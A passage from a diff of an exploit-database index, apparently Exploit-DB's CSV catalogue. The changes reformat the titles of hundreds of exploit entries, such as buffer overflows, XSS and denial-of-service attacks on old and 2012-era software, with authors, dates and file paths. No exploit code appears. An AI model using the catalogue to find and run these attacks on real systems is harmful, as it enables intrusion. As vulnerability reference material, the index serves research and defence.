-18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 +18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 @@ -16496,12 +16496,12 @@ id,file,description,date,author,platform,type,port 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 -19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 +19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,Metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - uploadify.php Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 @@ -16538,7 +16538,7 @@ id,file,description,date,author,platform,type,port 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 -19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 +19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 @@ -16549,9 +16549,9 @@ id,file,description,date,author,platform,type,port 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 -19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 +19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (1)",1999-07-03,Coolio,windows,dos,0 -19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 ffbconfig",1997-02-10,"Cristian Schipor",solaris,local,0 @@ -16618,7 +16618,7 @@ id,file,description,date,author,platform,type,port 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0",1999-05-10,"Thomas Krug",windows,local,0 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 -19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 +19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,Metasploit,windows,remote,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 @@ -16684,7 +16684,7 @@ id,file,description,date,author,platform,type,port 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 Plugin - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 -19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 +19295,platforms/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 @@ -16700,7 +16700,7 @@ id,file,description,date,author,platform,type,port 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow Proof of Concept",1998-01-14,"Aleph One",linux,dos,0 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 login",1997-05-26,"David Hedley",irix,local,0 +19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2_SGI IRIX 6.3_Solaris 2.6 mailx - (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2_SGI IRIX 6.3_Solaris 2.6 mailx - (2)",1998-06-25,segv,linux,local,0 19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint",1997-01-04,"Yuri Volobuev",irix,local,0 @@ -16724,10 +16724,10 @@ id,file,description,date,author,platform,type,port 19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 -19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 RLE Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 GIF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19334,platforms/windows/dos/19334.txt,"ACDSee PRO 5.1 CUR Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - .RLE Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 - .PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 - .GIF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19334,platforms/windows/dos/19334.txt,"ACDSee PRO 5.1 - .CUR Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19335,platforms/windows/dos/19335.txt,"XnView 1.98.8 GIF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",windows,dos,0 @@ -16741,7 +16741,7 @@ id,file,description,date,author,platform,type,port 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1_Solaris 2.6 Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset",1997-07-17,"Last Stage of Delirium",irix,local,0 -19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 login(1)",1996-12-04,anonymous,aix,remote,0 +19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1)",1996-12-04,anonymous,aix,remote,0 19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports",1994-02-02,transit,irix,local,0 @@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 19384,platforms/linux/local/19384.c,"Debian Linux 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 -19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 +19369,platforms/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0 @@ -16807,7 +16807,7 @@ id,file,description,date,author,platform,type,port 19437,platforms/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption",1999-07-29,"Prozaq of mSec",osx,local,0 19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 Emergency Password",1999-07-29,"Prozaq of mSec",osx,local,0 -19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry",1999-07-30,"David Litchfield",windows,local,0 +19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 - Malformed Dialer Entry",1999-07-30,"David Litchfield",windows,local,0 19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,dos,0 19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp",1998-11-28,"Frank Farance",windows,remote,0 19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 JHTML View Source",1999-07-30,"David Litchfield",multiple,remote,0 @@ -16823,7 +16823,7 @@ id,file,description,date,author,platform,type,port 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local DoS",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 -19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5_IIS 4.0_Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 +19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5_IIS 4.0_Site Server Commerce Edition 3.0 alpha/3.0 - DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local,0 @@ -16837,7 +16837,7 @@ id,file,description,date,author,platform,type,port 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron - Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0_S.u.S.E. Linux 6.0/6.1 Cron - Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 -19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 +19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 - HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 @@ -16867,7 +16867,7 @@ id,file,description,date,author,platform,type,port 19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20_Solaris 7.0 dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 -19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX 4.3.2_CDE 2.1_IRIX 6.5.14_Solaris 7.0_SunOS 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 +19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX 4.3.2_CDE 2.1_IRIX 6.5.14_Solaris 7.0_SunOS 4.1.4 - BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 @@ -16979,7 +16979,7 @@ id,file,description,date,author,platform,type,port 19608,platforms/windows/remote/19608.c,"Windows 95/98 UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote,0 19609,platforms/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14 b Relative Path",1999-11-08,"Shawn Hillis",freebsd,local,0 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 -19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 +19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 @@ -16991,7 +16991,7 @@ id,file,description,date,author,platform,type,port 19620,platforms/unix/remote/19620.txt,"Matt Wright FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 -19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 +19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow DoS",1999-11-17,"Ussr Labs",windows,dos,0 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 19626,platforms/php/webapps/19626.txt,"sflog! 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 @@ -17033,7 +17033,7 @@ id,file,description,date,author,platform,type,port 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0 19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5 a - Server SITE PASS DoS",1999-12-02,"Ussr Labs",windows,dos,0 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5.0 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0 -19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 DoS",1999-12-06,"Ussr Labs",windows,dos,0 +19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - DoS",1999-12-06,"Ussr Labs",windows,dos,0 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote,0 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 19669,platforms/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (2)",1999-06-24,"Cheez Whiz",solaris,remote,0 @@ -17090,9 +17090,9 @@ id,file,description,date,author,platform,type,port 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 19726,platforms/bsd/local/19726.c,"FreeBSD 3.4_NetBSD 1.4.1_OpenBSD 2.6 - /proc File Sytem",2000-01-21,Nergal,bsd,local,0 19727,platforms/linux/local/19727.c,"Inter7 vpopmail (vchkpw) 3.4.11 - Buffer Overflow",2000-01-21,K2,linux,local,0 -19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 +19728,platforms/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 - Default Permissions",1999-12-29,"Frank Monroe",windows,local,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 -19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0 +19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0 19731,platforms/windows/remote/19731.c,"Microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 19733,platforms/windows/local/19733.txt,"McAfee 4.0_Network Associates for Windows NT 4.0.2/4.0.3 a_Norton AntiVirus 2000 Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",windows,local,0 @@ -17112,7 +17112,7 @@ id,file,description,date,author,platform,type,port 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0 19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR DoS",2000-02-10,"Nobuo Miwa",windows,dos,0 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,multiple,remote,0 -19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS",2000-02-11,eth0,multiple,dos,0 +19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 - DoS",2000-02-11,eth0,multiple,dos,0 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink",2000-02-15,"Shawn Bracken",sco,local,0 19753,platforms/windows/remote/19753.txt,"Microsoft frontpage personal webserver 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0 @@ -17141,7 +17141,7 @@ id,file,description,date,author,platform,type,port 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - DoS",2000-02-26,"Jeff Stevens",multiple,dos,0 19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group EZShopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 -19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 DoS",2000-02-28,"Jon Hittner",windows,dos,0 +19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - DoS",2000-02-28,"Jon Hittner",windows,dos,0 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 GET Request",1999-08-25,"ISS X-Force",windows,dos,0 19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD Authentication",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0 @@ -17157,12 +17157,12 @@ id,file,description,date,author,platform,type,port 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0 19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local,0 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote,0 -19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 User Shell Folders",2000-03-09,anonymous,windows,local,0 +19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0 19799,platforms/windows/dos/19799.txt,"Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name DoS",2000-03-04,anonymous,windows,dos,0 19800,platforms/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0_Cisco PIX Firewall 4.x/5.x - 'ALG' Client",2000-03-10,"Dug Song",multiple,remote,0 19801,platforms/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Buffer Overflow",2000-03-10,bladi,linux,remote,0 -19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 -19803,platforms/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",linux,local,0 +19802,platforms/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Buffer Overflow (1)",2000-03-11,Krahmer,linux,local,0 +19803,platforms/linux/local/19803.txt,"Sam Hawker 